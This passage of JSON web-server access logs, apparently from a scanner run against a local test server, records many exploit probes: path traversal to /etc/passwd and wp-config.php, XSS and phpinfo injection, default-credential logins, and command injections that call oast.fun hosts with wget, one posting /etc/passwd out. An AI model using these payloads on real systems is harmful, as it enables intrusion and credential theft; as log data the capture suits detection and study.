HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://c9v8h8gsmpv8c1qg07h03ns4x9ka4hogz.oast.fun)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTp6fZrs7T5aqkVePqRQeDvQ?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8h8gsmpv8c1qg07h0grsxdqn8k5qmn.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php 